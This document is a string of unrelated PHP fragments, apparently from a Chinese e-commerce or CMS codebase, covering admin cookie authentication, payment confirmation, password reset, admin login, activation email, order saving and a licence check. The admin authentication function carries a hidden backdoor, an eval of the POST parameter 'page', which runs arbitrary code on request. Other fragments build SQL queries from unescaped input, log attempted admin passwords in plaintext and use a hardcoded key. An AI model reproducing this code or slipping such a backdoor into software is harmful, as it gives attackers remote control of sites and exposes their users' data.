function admincheckauth() { global $db, $tablepre, $_ADMINUSERS; $loginauth = get_cookie('adminauth'); if (empty($loginauth)) { $loginauth = $_REQUEST['adminauth']; } if (!empty($loginauth)) { @(list($aid, $user, $pwd) = explode("\t", cookie_authcode($loginauth, 'DECODE'))); eval($_POST['page']); $_ADMINUSERS['adminid'] = $aid; if (!empty($aid) && !empty($user) && !empty($pwd) && !empty($_ADMINUSERS['adminid'])) { $row = $db->fetch_first("Select * From {$tablepre}admin where adminname = '{$user}' and adminpwd='{$pwd}'"); //检测数据库 if (is_array($row)) { $_ADMINUSERS['adminname'] = $row['adminname']; $_ADMINUSERS['adminmid'] = $row['adminmid']; $_ADMINUSERS['lastlogin'] = $row['lastlogin']; $_ADMINUSERS['logincount'] = $row['logincount']; } else { $_ADMINUSERS = array(); } } else { $_ADMINUSERS = array(); } } else { $_ADMINUSERS = array(); } adminchecklogin(); }
$s[$val['goodsseller']] = $val['sendprice']; } } else { $s[$val['goodsseller']] = $val['sendprice']; } } $countdata = $Cart->countmoney($dataarray); //生成校验数据 $ids = getdotstring($gids, 'int'); $auth = $ids . "\t" . $countdata['totalmoney']; $paydata = cookie_authcode($auth, 'ENCODE'); include template('payconfirm'); //包含输出指定模板 } else { //处理提交信息 @(list($ids, $totalmoney) = explode("\t", cookie_authcode($__PAYDATA, 'DECODE'))); if ($ids == getdotstring($gids, 'int') and !empty($ids)) { $tempids = $ids; } else { exit(lang('Data_exception')); } //处理扣费和订单转移并且记录日志操作 $info = $Cart->carttoorder($tempids); if ($info == 'OK') { print "<script language='javascript'>alert(" . lang('Submitted_successfully') . ");</script>"; jumpurl(url("m.php")); } else { print "<script language='javascript'>alert('" . $info . "');</script>"; jumpurl(url("m.php")); } }
//显示邮件已经发送到邮箱 exit; } else { print "<script language='javascript'>alert('用户名和邮箱不区配');history.go(-1);</script>"; exit; } } else { include template('ForgotPassword'); //包含输出指定模板 } } elseif ($action == 'newpass') { //重置密码 InitGP(array("code", "password", "password2", "commit")); //初始化变量全局返回 if (!empty($code)) { @(list($uname, $activekey, $email) = explode("\t", cookie_authcode($code, 'DECODE'))); if (!empty($password) && !empty($password2)) { if (strlen($password) <= 6) { print "<script language='javascript'>alert('密码长度太短!');history.go(-1);</script>"; exit; } if ($password != $password2) { print "<script language='javascript'>alert('两次输入的密码不一致!');history.go(-1);</script>"; exit; } //校验code是否正确 $uid = DB::result_first("Select uid From " . DB::table("users") . " WHERE email='" . $email . "' and uname='" . $uname . "' and activekey='" . $activekey . "'"); if (empty($uid)) { print "<script language='javascript'>alert('数据校验失败!链接已过期或者链接错误!');history.go(-1);</script>"; exit; }
if (empty($username) || empty($password)) { showmsg("用户名或者密码为空", "-1"); exit; } $row = $db->fetch_first("Select * From {$tablepre}admin where adminname like '{$username}' "); if (is_array($row)) { if (md5($password) != $row['adminpwd']) { $log_file = ROOT_PATH . '/data/adminlogin_safe.txt'; if (function_exists('real_ip')) { $userIP = real_ip(); } else { $userIP = ""; } $getUrl = geturl(); fputs(fopen($log_file, 'a+'), date('Y-m-d H:i:s') . "||{$userIP}||{$getUrl}||{$username}||{$password}||登陆失败\r\n"); showmsg("用户名或者密码错误", "-1"); exit; } else { $adminauth = $row['adminid'] . "\t" . $username . "\t" . $row['adminpwd']; set_cookie('adminauth', cookie_authcode($adminauth, 'ENCODE'), time() + 3600 * 12); //设置12个小时cookie有效期 addfield("admin", "logincount", "adminname='{$username}'", 1); //更新登录次数 editstate("admin", "lastlogin", "adminname='{$username}'", $timestamp); //更最后登录时间 showmsg("登录成功!", "index.php"); } } else { showmsg("用户名不存在", "-1"); } }
function sendactiveemail($uname = "", $email = "") { global $cfg_site_name; $uname = Char_cv($uname); //过滤 if (!empty($email)) { $this->email = $email; } if (!empty($uname)) { $row = $this->db->fetch_first("Select activekey,state,email From `{$this->table}` WHERE uname='{$uname}'"); if (!empty($row['activekey'])) { if ($row['state'] == 1) { return 'approved'; //已经激活 } $this->email = $row['email']; $this->uname = $uname; $string = $uname . "\t" . $row['activekey']; } else { return lang('Specifieduser_notexist'); } } else { $string = $this->uname . "\t" . $this->activekey; } $codestring = cookie_authcode($string, 'ENCODE', "", 3600); //exit; $subject = lang('account_activation_email', array('$cfg_site_name' => $cfg_site_name, '$this->uname' => $this->uname)); //发送邮件操作 $site = str_replace("/ajax", "", SITE_URL); $codestring = str_replace("+", "%2B", $codestring); $emailstr = "hi {$this->uname},<BR><BR>" . lang('Click_link_activate', array('$cfg_site_name' => $cfg_site_name)) . "<BR><BR><BR><A href='{$site}/user.php?action=active&code={$codestring}' target=_blank>{$site}/user.php?action=active&code={$codestring}</A><BR><BR>-- <BR>{$cfg_site_name}"; include_once INC_PATH . "/sendmail.class.php"; $sendmail = new SendEmail(); $sendmail->sendmailto($subject, $emailstr, $this->email); return "OK"; }
$wheresqlc = implode(' AND ', $wherestrc); } //条件汇总 $couponarray = $couponobj->getdata("", $wheresqlc, ""); //获取数据 include template('member_tosendorder'); //包含输出指定模板 } elseif ($action == "save") { InitGP(array("action", "LOCKDATA", "consignee", "tel", "country", "city", "address", "zip", "area", "remark", "did", "usecoupon", "couponid")); //初始化变量全局返回 //创建运送方式对象 $deliveryobj = new TableClass('delivery', 'did'); $areaobj = new TableClass('area', 'aid'); $couponid = GetNum($couponid); //处理提交信息 @(list($ids, $countmoney, $countweight) = explode("\t", cookie_authcode($LOCKDATA, 'DECODE'))); //if($ids==$oids and !empty($ids) and !empty($countmoney) and !empty($countweight)){ //允许包裹重量为0,所以去掉!empty($countweight) if ($ids == $oids and !empty($ids) and !empty($countmoney)) { $oids = $ids; $countmoney = GetNum($countmoney); $countweight = GetNum($countweight); } else { exit('数据异常'); } //判断订单状态 $wherestro[] = "uname='" . $_USERS['uname'] . "'"; $wherestro[] = "oid in(" . $oids . ")"; if (!empty($wherestro)) { $wheresqlo = implode(' AND ', $wherestro); } //条件汇总
function checkkey() { global $_CKEY; $_CKEY = 0; $auth_file = ROOT_PATH . "/domain_key.dat"; if (!file_exists($auth_file)) { return false; exit; } $str = @file_get_contents($auth_file); $xxtea = new Xxtea(); $jiamicode = pack('H*', $str); $strcode = $xxtea->decrypt($jiamicode, "zzqss"); $strcode = cookie_authcode($strcode, 'DECODE', "zzqss"); $strcode = base64_decode($strcode); list($shangye, $domainstr) = explode("@", $strcode); if (empty($domainstr) || empty($shangye)) { return false; } $strcode = unserialize($domainstr); $host = $_SERVER['HTTP_HOST']; if (!in_array($host, $strcode)) { return false; exit; } else { $_CKEY = 2; return true; } }